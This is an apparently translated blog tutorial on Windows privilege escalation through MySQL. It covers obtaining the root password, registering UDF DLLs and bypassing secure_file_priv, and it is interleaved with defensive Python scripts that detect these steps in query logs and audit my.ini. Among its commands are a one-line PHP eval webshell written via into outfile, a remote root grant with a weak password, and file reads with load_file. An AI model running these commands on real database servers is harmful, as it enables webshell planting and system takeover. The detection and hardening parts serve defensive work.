Windows privilege escalation series (2)

Posted by lipsius at 2020-04-01

This article is mainly about privilege escalation through database services. Today's content covers privilege escalation using MySQL and MSSQL.

Privilege escalation with MySQL

Before using MySQL for privilege escalation, first review the common MySQL commands:

Find the install path: select @@basedir as basepath from dual

select * from mysql.user

Register a function: create function shell returns string soname 'udf.dll'

Check version: select version();

Export: select load_file(0x633a5c626f6f742e696e69) from user into outfile 'd://a.txt'

Write a file: select '<?php eval($_POST[cmd]);?>' into outfile 'f://a.php';

Enable remote connections: grant all privileges on *.* to 'root'@'%' identified by '123456' with grant option;

Read a file: select load_file('c:\\boot.ini')

Move a file: select load_file('c:/wmpub/nullevt.mof') into dumpfile 'c:/windows/system32/wbem/mof/nullevt.mof'
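The commands above are exactly what a defender should expect to see in the MySQL general query log during a UDF or file-export attempt. The following detection script is an added example, not part of the original post: it parses constructed general-log lines in the MySQL 5.7 format (timestamp, thread id, command type, argument), flags the statement types listed above, and then correlates a file write followed by CREATE FUNCTION ... SONAME within one connection thread. The sample log lines, rule names and severities are assumptions made for this example.

```python
import re
from dataclasses import dataclass

# Constructed sample of a MySQL 5.7 general query log (tab-separated: timestamp,
# right-aligned thread id, command type, argument). Not taken from the post.
SAMPLE_LOG = """\
2020-04-01T10:00:01.000001Z\t   12 Connect\troot@localhost on  using TCP/IP
2020-04-01T10:00:02.000001Z\t   12 Query\tselect version()
2020-04-01T10:00:03.000001Z\t   12 Query\tselect @@basedir as basepath from dual
2020-04-01T10:00:04.000001Z\t   12 Query\tshow variables like '%plugin%'
2020-04-01T10:00:05.000001Z\t   12 Query\tselect 0x4d5a90 into dumpfile 'C:/Program Files/MySQL/lib/plugin/udf.dll'
2020-04-01T10:00:06.000001Z\t   12 Query\tcreate function shell returns string soname 'udf.dll'
2020-04-01T10:00:07.000001Z\t   13 Query\tselect name, price from products where id = 42
2020-04-01T10:00:08.000001Z\t   14 Query\tgrant all privileges on *.* to 'root'@'%' identified by '123456' with grant option
"""

# One general-log record per line: timestamp, thread id, command type, argument.
LINE_RE = re.compile(r"^(?P<ts>\S+)\t\s*(?P<thread>\d+) (?P<cmd>\w+)\t(?P<arg>.*)$")

# Detection rules: (name, severity, regex applied case-insensitively to the statement).
RULES = [
    ("udf_register", "critical",
     re.compile(r"\bcreate\s+(or\s+replace\s+)?(aggregate\s+)?function\b.*\bsoname\b", re.I)),
    ("file_write", "high", re.compile(r"\binto\s+(outfile|dumpfile)\b", re.I)),
    ("file_read", "high", re.compile(r"\bload_file\s*\(", re.I)),
    ("remote_grant", "high", re.compile(r"\bgrant\b.*\bto\s+'[^']*'@'%'", re.I)),
    ("recon", "low",
     re.compile(r"@@(basedir|plugin_dir|datadir|version_compile_os)|like\s+'%(plugin|secure)%'", re.I)),
]


@dataclass
class Finding:
    thread: int
    rule: str
    severity: str
    statement: str


def parse_line(line):
    """Split one general-log line into its fields; None for lines in another format."""
    m = LINE_RE.match(line)
    return m.groupdict() if m else None


def scan(log_text):
    """Apply every rule to every Query record and collect the matches in log order."""
    findings = []
    for raw in log_text.splitlines():
        rec = parse_line(raw)
        if rec is None or rec["cmd"] != "Query":
            continue
        for name, severity, rx in RULES:
            if rx.search(rec["arg"]):
                findings.append(Finding(int(rec["thread"]), name, severity, rec["arg"]))
    return findings


def udf_chains(findings):
    """Threads that both wrote a file and registered a UDF: the whole chain in one session."""
    by_thread = {}
    for f in findings:
        by_thread.setdefault(f.thread, set()).add(f.rule)
    return sorted(t for t, rules in by_thread.items()
                  if {"file_write", "udf_register"} <= rules)


if __name__ == "__main__":
    found = scan(SAMPLE_LOG)
    for f in found:
        print(f"[{f.severity:8}] thread {f.thread}: {f.rule}: {f.statement}")
    print("UDF chains in threads:", udf_chains(found))
```

The recon rule is low severity on its own, since @@basedir and SHOW VARIABLES are also used by administrators; its value is in the correlation step, where recon, a DUMPFILE write and a SONAME registration from the same thread id in a few seconds is the signature of the manual procedure this post describes. The general log must be enabled for this to work; on busy servers the audit plugin or a query proxy is the usual source instead.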

Finding the root password

All three ways of escalating privileges with MySQL need the password of root, the highest-privileged MySQL account. So let's first discuss how to obtain the MySQL root password:

1. Look through configuration files. Keywords: config, conn, data, sql, inc, database, etc.

2. Download the data file and crack the stored password hash.

The root password hash is stored in the MySQL data directory under /mysql/user.myd, which can be read from a low-privilege account, or read directly with dark moon's "MySQL low-privilege root password reader" tool, and then cracked with cmd5.

3. Brute-force cracking. Use a brute-forcing tool such as [Phoenix scanner] (

Privilege escalation with UDF

UDF stands for user-defined function: MySQL lets users define their own functions. The custom function here is written as a MySQL plug-in in the form of a DLL and handed to MySQL to load, which means we can implement whatever functionality we need by writing a DLL. For writing UDFs, refer to ( . Prerequisites: the root account's password is known and the target system is Windows. An off-the-shelf UDF privilege escalation tool can be used; below is the manual test method.

1. Check the MySQL version

select version(); # --> 5.7.14

2. Upload the DLL file

DLL files can be uploaded through a webshell or exported by MySQL. The extension does not have to be .dll; it can be anything. 64-bit and 32-bit MySQL need different DLL files: registering a 32-bit DLL on a 64-bit system fails with the error:

Can't open shared library 'udf.dll' (errno: 193 )

In MySQL before 4.1, any function in any DLL could be registered for MySQL to call, regardless of where the DLL was located or what the function's declaration looked like.

In MySQL 4.1 and later, UDFs are restricted: only functions with a specific interface can be registered, which prevents illegal calls to system DLLs through MySQL.

After MySQL 5.0, the location of registered DLLs is restricted: when creating a function, the DLL name cannot contain / or \, which simply means it cannot be an absolute path. So we upload the DLL to a directory listed in the PATH environment variable to bypass the restriction (run echo %path% to find a writable directory, for example C:\windows\udf.dll or C:\windows\system32\udf.dll), or put it in the root of a drive and refer to it as C:udf.dll.

echo %path%

For MySQL 5.1 and above, the DLL must be uploaded to the lib\plugin folder under the MySQL installation directory before a custom function can be created. By default the plugin folder does not exist, possibly to prevent DLLs from being written into it with into dumpfile. You can use show variables like '%plugin%' to see whether the plugin folder exists. The lib and plugin folders can be created manually from a webshell, or created with an NTFS ADS stream as follows (on 5.7.14: insufficient permissions, Errcode: 13 - Permission denied; 5.5.8 works. Which versions work?):

show variables like '%plugin%'

Errcode: 13 - Permission denied

If the MySQL server has the secure_file_priv option enabled, files can only be exported to the specified directory. Query its value with show variables like '%secure%'. Use # to comment out the line secure_file_priv="C:/wamp64/tmp" in my.ini or mysql.cnf under the MySQL installation directory, then restart MySQL, and files can be exported to any directory. (To be resolved: does the Apache user have permission to change this configuration file and restart MySQL?)

show variables like '%secure%';

secure_file_priv="c:/wamp64/tmp"

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
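The two settings this section turns on, secure_file_priv and the presence of a writable plugin directory, are also the two things a defender should audit on a MySQL host. The following script is an added example, not from the post: it parses a my.ini fragment and reports the weak configuration the section relies on (secure_file_priv commented out) next to the hardened one (secure_file_priv=NULL, no writable plugin_dir). Both my.ini fragments are constructed for this example. The plugin_dir writability check uses os.access for the account running the script, so it assumes the audit is run as the MySQL service account; run as anyone else it only reflects that account's rights and an ACL check is needed instead.

```python
import configparser
import os
import tempfile

# Constructed my.ini fragments (not from the post). WEAK mirrors the bypass described
# above: the secure_file_priv line has been commented out, so exports are unrestricted.
WEAK_INI = """\
[mysqld]
basedir="c:/wamp64/bin/mysql/mysql5.7.14"
datadir="c:/wamp64/bin/mysql/mysql5.7.14/data"
# secure_file_priv="c:/wamp64/tmp"
"""

# HARDENED disables server-side file import/export entirely.
HARDENED_INI = """\
[mysqld]
basedir="c:/wamp64/bin/mysql/mysql5.7.14"
datadir="c:/wamp64/bin/mysql/mysql5.7.14/data"
secure_file_priv=NULL
"""


def parse_mysqld_section(ini_text):
    """Return the [mysqld] options as a dict; dashes normalised to underscores, quotes stripped."""
    cp = configparser.ConfigParser(allow_no_value=True, interpolation=None)
    cp.read_string(ini_text)
    if not cp.has_section("mysqld"):
        return {}
    return {k.replace("-", "_"): (v or "").strip().strip('"') for k, v in cp.items("mysqld")}


def audit(mysqld, plugin_dir):
    """Return (severity, message) findings for the file-export and plugin-dir settings."""
    findings = []
    sfp = mysqld.get("secure_file_priv")
    if not sfp:
        findings.append(("high", "secure_file_priv is unset: LOAD_FILE / INTO OUTFILE / "
                                 "INTO DUMPFILE can use any path the service account can reach"))
    elif sfp.upper() == "NULL":
        findings.append(("ok", "secure_file_priv=NULL: server-side file import/export disabled"))
    else:
        # A directory restriction is only useful if it does not cover plugin_dir itself.
        sfp_norm = os.path.normcase(os.path.abspath(sfp))
        pd_norm = os.path.normcase(os.path.abspath(plugin_dir))
        if pd_norm == sfp_norm or pd_norm.startswith(sfp_norm + os.sep):
            findings.append(("high", f"secure_file_priv ({sfp}) covers plugin_dir: "
                                     "INTO DUMPFILE can drop a UDF library there"))
        else:
            findings.append(("info", f"file export restricted to {sfp}"))

    if not os.path.isdir(plugin_dir):
        findings.append(("ok", f"plugin_dir {plugin_dir} does not exist; "
                               "CREATE FUNCTION ... SONAME has nowhere to load from"))
    elif os.access(plugin_dir, os.W_OK):
        findings.append(("high", f"plugin_dir {plugin_dir} is writable by the account running this audit"))
    else:
        findings.append(("ok", f"plugin_dir {plugin_dir} is not writable by the account running this audit"))
    return findings


def severities(findings):
    return [severity for severity, _ in findings]


def demo():
    """Audit both fragments against a throwaway plugin_dir; returns (weak, hardened) findings."""
    with tempfile.TemporaryDirectory() as tmp:
        weak = audit(parse_mysqld_section(WEAK_INI), tmp)                          # existing, writable
        hardened = audit(parse_mysqld_section(HARDENED_INI), os.path.join(tmp, "plugin"))  # absent
    return weak, hardened


if __name__ == "__main__":
    for label, result in zip(("weak", "hardened"), demo()):
        print(f"== {label} ==")
        for severity, message in result:
            print(f"  [{severity}] {message}")
```

On a real host, replace the tempdir with the value of plugin_dir from show variables like '%plugin%' and the path of the my.ini actually loaded by the service. The open question in the section above (whether the web server account can edit my.ini and restart MySQL) is the same ACL question in reverse: if that account can write the configuration file, none of the settings checked here hold.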